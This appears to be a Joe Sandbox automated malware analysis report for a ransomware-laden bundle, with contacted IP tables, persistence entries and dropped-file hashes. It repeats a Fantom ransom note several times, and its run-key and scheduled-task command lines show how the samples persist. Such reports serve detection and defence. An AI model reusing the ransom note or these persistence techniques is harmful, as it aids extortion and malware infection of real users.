                                                                                                        http://ocsp.thawte.com0rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.347913498.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.329448544.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363121457.000000000335A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342307244.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.330844092.0000000003363000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.53.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs
                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        87.98.177.219
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.218
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.215
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.214
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.217
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.216
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.211
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.210
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.213
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.212
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.208
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.207
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.209
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.204
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.203
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.206
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.205
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.200
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.202
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.201
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.2
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.1
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.4
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.3
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        172.217.168.14
                                                                                                        google.comUnited States
                                                                                                        15169GOOGLEUSfalse
                                                                                                        87.98.177.0
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.9
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.6
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.5
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.8
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.7
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        95.1.200.1
                                                                                                        unknownTurkey
                                                                                                        9121TTNETTRfalse
                                                                                                        87.98.177.237
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        95.1.200.2
                                                                                                        unknownTurkey
                                                                                                        9121TTNETTRfalse
                                                                                                        87.98.177.236
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.239
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        95.1.200.0
                                                                                                        unknownTurkey
                                                                                                        9121TTNETTRfalse
                                                                                                        87.98.177.238
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        95.1.200.5
                                                                                                        unknownTurkey
                                                                                                        9121TTNETTRfalse
                                                                                                        87.98.177.233
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        95.1.200.6
                                                                                                        unknownTurkey
                                                                                                        9121TTNETTRfalse
                                                                                                        87.98.177.232
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        95.1.200.3
                                                                                                        unknownTurkey
                                                                                                        9121TTNETTRfalse
                                                                                                        87.98.177.235
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        95.1.200.4
                                                                                                        unknownTurkey
                                                                                                        9121TTNETTRfalse
                                                                                                        87.98.177.234
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        95.1.200.9
                                                                                                        unknownTurkey
                                                                                                        9121TTNETTRfalse
                                                                                                        95.1.200.7
                                                                                                        unknownTurkey
                                                                                                        9121TTNETTRfalse
                                                                                                        87.98.177.231
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        95.1.200.8
                                                                                                        unknownTurkey
                                                                                                        9121TTNETTRfalse
                                                                                                        87.98.177.230
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.249
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.248
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.247
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.246
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.179.97
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.179.96
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.179.99
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.179.98
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.241
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.179.93
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.240
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.179.92
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.179.95
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.179.94
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.245
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.244
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.243
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.179.91
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.242
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.179.90
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.229
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.226
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.225
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.228
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.227
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.222
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.221
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.224
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.223
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.177.220
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.252
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.251
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.250
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.255
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.254
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.253
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        93.107.12.20
                                                                                                        unknownIreland
                                                                                                        15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                        93.107.12.21
                                                                                                        unknownIreland
                                                                                                        15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                        93.107.12.22
                                                                                                        unknownIreland
                                                                                                        15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                        93.107.12.23
                                                                                                        unknownIreland
                                                                                                        15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                        93.107.12.24
                                                                                                        unknownIreland
                                                                                                        15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                        93.107.12.25
                                                                                                        unknownIreland
                                                                                                        15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                        93.107.12.26
                                                                                                        unknownIreland
                                                                                                        15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                        93.107.12.27
                                                                                                        unknownIreland
                                                                                                        15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                        93.107.12.28
                                                                                                        unknownIreland
                                                                                                        15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                        93.107.12.29
                                                                                                        unknownIreland
                                                                                                        15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                        87.98.178.227
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.179.79
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        87.98.178.226
                                                                                                        unknownFrance
                                                                                                        16276OVHFRfalse
                                                                                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                        Analysis ID:712614
                                                                                                        Start date and time:2022-09-29 14:43:59 +02:00
                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                        Overall analysis duration:0h 14m 8s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Sample file name:4W5dQXszUV.exe
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                        Number of analysed new started processes analysed:67
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • HDC enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.rans.spre.troj.spyw.expl.evad.winEXE@110/160@10/100
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 75%
                                                                                                        HDC Information:
                                                                                                        • Successful, ratio: 64.8% (good quality ratio 61.5%)
                                                                                                        • Quality average: 78.4%
                                                                                                        • Quality standard deviation: 28.1%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 98%
                                                                                                        • Number of executed functions: 121
                                                                                                        • Number of non-executed functions: 93
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Connection to analysis system has been lost, crash info: Unknown
                                                                                                        • Exclude process from analysis (whitelisted): SearchUI.exe, backgroundTaskHost.exe
                                                                                                        • Excluded domains from analysis (whitelisted): collect.installeranalytics.com, secure1.safe-scanerwas.com, yandex.ru, searchaccount.org, login.live.com, google.ru, www.vikingwebscanner.com, www5.internet-security-guard.com, watson.telemetry.microsoft.com, ashamedice.com, secure2.simplenetworkzqi.com
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        TimeTypeDescription
                                                                                                        14:45:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run system C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exe
                                                                                                        14:45:13Task SchedulerRun new task: rhaegal path: C:\Windows\system32\cmd.exe s>/C Start "" "C:\Windows\dispci.exe" -id 189355826 &amp;&amp; exit
                                                                                                        14:45:14API Interceptor1x Sleep call for process: Endermanch@Cerber5.exe modified
                                                                                                        14:45:14API Interceptor42x Sleep call for process: rundll32.exe modified
                                                                                                        14:45:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem "C:\ProgramData\Windows\csrss.exe"
                                                                                                        14:45:42API Interceptor1x Sleep call for process: Fantom.exe modified
                                                                                                        14:45:53API Interceptor1x Sleep call for process: rCUUIQEQ.exe modified
                                                                                                        14:45:53API Interceptor1x Sleep call for process: wKAwMsck.exe modified
                                                                                                        14:46:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run rCUUIQEQ.exe C:\Users\user\yeYUggIg\rCUUIQEQ.exe
                                                                                                        14:46:08Task SchedulerRun new task: sys path: C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe
                                                                                                        14:46:32AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\WINDOWS\Web\rundll32.exe
                                                                                                        14:47:17AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AVPCC C:\WINDOWS\Cursors\avp.exe
                                                                                                        No context
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        github.com05dfb699.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        a29b4832.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        UIvwi4Oprs.jarGet hashmaliciousBrowse
                                                                                                        • 140.82.121.3
                                                                                                        6IXn8C3LvN.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        fPMt63h1Bx.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.3
                                                                                                        8DjKJy19fW.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        X3VTSsbYNU.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.3
                                                                                                        4c4Dt7ag0O.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        VyyuC2FGJI.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.3
                                                                                                        wvzo8Sq723.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        SHIPMENT DOCUMENTS#CUSTOMS.PDF.jarGet hashmaliciousBrowse
                                                                                                        • 140.82.121.3
                                                                                                        cosmeticss.jarGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        WmWEBNxSDk.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        Receipt.jarGet hashmaliciousBrowse
                                                                                                        • 140.82.121.3
                                                                                                        uDNdxuGOJJ.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        6tZuVq6gtV.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        UDO_Device_Enrolment.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        ITSBi3J3ws.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.3
                                                                                                        Oya6cSyAWh.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        QQNkZaudJn.exeGet hashmaliciousBrowse
                                                                                                        • 140.82.121.4
                                                                                                        No context
                                                                                                        No context
                                                                                                        No context
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1771
                                                                                                        Entropy (8bit):5.614257404335169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOj6bn5x4qYlrKq3UejODqI:b/hppMGHPsUJif/8u6b5xklrKq9zLE
                                                                                                        MD5:D9BC5624E75F6A568289AA2D372A3478
                                                                                                        SHA1:F789943DE5F88B9ADD94F3F1A00CA7F20C7984AF
                                                                                                        SHA-256:51ABC745E35B308272FA83850C3F92F38C85D16F5FA65006847E4EDD909EAC16
                                                                                                        SHA-512:5880CB71FBE3F54A46DDFF1F27A8CD078D65A0DA14E1A069A549588F473DC7B0DF51366993690E2F8566B6F8A9CAEDBCB73D7AB8E8D64F22929143B46EFD7DA9
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1771
                                                                                                        Entropy (8bit):5.614257404335169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOj6bn5x4qYlrKq3UejODqI:b/hppMGHPsUJif/8u6b5xklrKq9zLE
                                                                                                        MD5:D9BC5624E75F6A568289AA2D372A3478
                                                                                                        SHA1:F789943DE5F88B9ADD94F3F1A00CA7F20C7984AF
                                                                                                        SHA-256:51ABC745E35B308272FA83850C3F92F38C85D16F5FA65006847E4EDD909EAC16
                                                                                                        SHA-512:5880CB71FBE3F54A46DDFF1F27A8CD078D65A0DA14E1A069A549588F473DC7B0DF51366993690E2F8566B6F8A9CAEDBCB73D7AB8E8D64F22929143B46EFD7DA9
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1771
                                                                                                        Entropy (8bit):5.614257404335169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOj6bn5x4qYlrKq3UejODqI:b/hppMGHPsUJif/8u6b5xklrKq9zLE
                                                                                                        MD5:D9BC5624E75F6A568289AA2D372A3478
                                                                                                        SHA1:F789943DE5F88B9ADD94F3F1A00CA7F20C7984AF
                                                                                                        SHA-256:51ABC745E35B308272FA83850C3F92F38C85D16F5FA65006847E4EDD909EAC16
                                                                                                        SHA-512:5880CB71FBE3F54A46DDFF1F27A8CD078D65A0DA14E1A069A549588F473DC7B0DF51366993690E2F8566B6F8A9CAEDBCB73D7AB8E8D64F22929143B46EFD7DA9
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1771
                                                                                                        Entropy (8bit):5.614257404335169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOj6bn5x4qYlrKq3UejODqI:b/hppMGHPsUJif/8u6b5xklrKq9zLE
                                                                                                        MD5:D9BC5624E75F6A568289AA2D372A3478
                                                                                                        SHA1:F789943DE5F88B9ADD94F3F1A00CA7F20C7984AF
                                                                                                        SHA-256:51ABC745E35B308272FA83850C3F92F38C85D16F5FA65006847E4EDD909EAC16
                                                                                                        SHA-512:5880CB71FBE3F54A46DDFF1F27A8CD078D65A0DA14E1A069A549588F473DC7B0DF51366993690E2F8566B6F8A9CAEDBCB73D7AB8E8D64F22929143B46EFD7DA9
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1771
                                                                                                        Entropy (8bit):5.614257404335169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Pz/aOxTpMreyR/xavHJZb50oEZUBeSc6kNfNvvTl8JOj6bn5x4qYlrKq3UejODqI:b/hppMGHPsUJif/8u6b5xklrKq9zLE
                                                                                                        MD5:D9BC5624E75F6A568289AA2D372A3478
                                                                                                        SHA1:F789943DE5F88B9ADD94F3F1A00CA7F20C7984AF
                                                                                                        SHA-256:51ABC745E35B308272FA83850C3F92F38C85D16F5FA65006847E4EDD909EAC16
                                                                                                        SHA-512:5880CB71FBE3F54A46DDFF1F27A8CD078D65A0DA14E1A069A549588F473DC7B0DF51366993690E2F8566B6F8A9CAEDBCB73D7AB8E8D64F22929143B46EFD7DA9
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:<html>..<head>..<style>..body{...background-color: #3366CC;...}.. h1 {.. background-color: RGB(249, 201, 16);.. }.. p {.. background-color: maroon; .. color: white;.. }... ..</style>..</head>....<body>...<center>...<h1><b> Attention ! All your files </b> have been encrypted. </h1></br>..<p>..Due encrypting was used algoritm RSA-4096 and AES-256, used for protection military secrets.</br>..That means > RESTORE YOU DATA POSIBLE ONLY BUYING decryption passwords from us.</br>..Getting a decryption of your files is - SIMPLY task.</br></br>..That all what you need:</br>..1. Sent Your ID_KEY on mailbox fantomd12@yandex.ru or fantom12@techemail.com </br>..2. For test, decrypt 2 small files, to be sure that we can decrypt you files.</br>..3. Pay our services. </br>..4. GET software with passwords for decrypt you files.</br>..5. Make measures to prevent this type situations again.</br></br>..IMPORTANT(1)</br>..Do not try restore files without our help, this is useless, and
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):411760
                                                                                                        Entropy (8bit):7.999498929828355
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:6144:+0YHIpclOcCUa+eGbx5k32/el3JPEDZEY4KhmddCdHcHVqbl6e34U5Lh4Suc:6opcls7JGbx5CVEDZEMmda81GoM4Suc
                                                                                                        MD5:526484FDA21FD2A9924757F6D8D49074
                                                                                                        SHA1:C28101E0E074DB4A05E4BC7619596FB1DF6F5D6B
                                                                                                        SHA-256:2F017EF69E05FCD16D6AA7F8780FAB0F3DF64AC1F18C597CBE881EAB41D6CABE
                                                                                                        SHA-512:0EAB83B4393201A16FAEAED2F059FA268CC680CC62ADF7B4A3E02443CFACC89B57060CB3D6D0C2499BB4884B6C44F4CD7F6F91522E461E6B503F26B85C10D650
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:..}c.......g.P..9....r..v..W..`#.zfK.....*._......h.).-.3.)z.........l2.....K.x.F.T.j..Qq>X1.Ef=X..]...ML.Z.."d.....[.Z.....P.1...+.W.."...'u."JmWS<..|...\7..'&.]4...!.mv..C........K............0.......~9......S.-,.E..c...K.b....<.^."... .. ..g.h{7.Q.}.Vd...#B.5..1..1...J..U.X.3...H...\...].,I........c&.O..0/.b....O_z`)M[m.`[<...r$WnV#z...%{3..Z^.`F./..........>.Y.)..|..F.e....<.w:eFJ...R..........Ne...O.B...a..g.]...8.".#.x...{.Y.z...n.)o....8..+`...hS.c.w.>z.X~.."K...'....)RYK....y".....py....i>...d....C..H...U...;..1m...2{c.\JC...Q..i....>...8D.x..#..2..-.Yv...YeCn<83....G..X..:C;.m.>..GY...8.F....(Z....`..&.......+w......YN..4.......u=FD..!.wS..+...DL....p....._...q].J.Q.......lB0.`Vt.{..{.....P..O...R....v.....uJ.E.v..[*.`.....@.<\_.....w...............9.....$F.....S....._,..~.'..<+GN.*C.....z...'a$U...i|S.}.`...b.p7.=.>........y...{cO$.;_g21r&........W.2......Q.Y.J.'..WQ..c.....RO.cS.").P.t.......?.....29.0.G.....{......nQ.s_....{
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):991248
                                                                                                        Entropy (8bit):7.999835957422891
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:24576:v7Osf7VJGswPdgMowc31z6hEEta6zL7Sa9dFg7X:iK7asIgMo3lz6hBtn2Odm7X
                                                                                                        MD5:B0AB4BC4AF98DE311A62EB2A0E85F6B7
                                                                                                        SHA1:5FD68AA27E38A895EF0FB98B5A3B8B8641FD4218
                                                                                                        SHA-256:0CD83AE3C657F0CC32993F124AA70132DBC05897CDAB6A55F26271A95D5BD161
                                                                                                        SHA-512:0C09C67A93509F6A790A9CBA0006D5ED8767BF88EBDA956760D66463B560F66A55092D392345697E7A45C73063023DBC2FBF491789A112FD171F31A70F87DF6B
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
